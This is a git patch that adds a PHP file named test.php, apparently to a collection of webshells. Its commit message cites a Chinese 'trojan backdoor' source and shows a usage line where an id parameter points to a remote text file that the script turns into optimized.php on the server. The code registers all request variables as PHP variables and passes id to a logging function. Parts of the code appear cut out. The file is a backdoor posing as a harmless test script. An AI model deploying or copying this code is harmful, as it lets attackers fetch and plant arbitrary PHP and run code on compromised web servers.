From 0add9c4465a494fa9ca11f849cc11faec3ddab6e Mon Sep 17 00:00:00 2001 From: tennc Date: Wed, 23 Oct 2019 22:47:21 +0800 Subject: [PATCH] Create test.php from:https://github.com/tide-emergency/yingji/blob/master/%E6%9C%A8%E9%A9%AC%E5%90%8E%E9%97%A8/test.php use: http://xxx.xxx/plus/test.php?id=http://xx.x.xx.xx:xxx/s/admine21.txt ====> optimized.php --- php/test.php | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 php/test.php diff --git a/php/test.php b/php/test.php new file mode 100644 index 0000000..27ca79f --- /dev/null +++ b/php/test.php @@ -0,0 +1,21 @@ +$_value) + { + $$_key= $_value; + } +} +$id = isset($id) ? $id : 2; +log1($id); +?>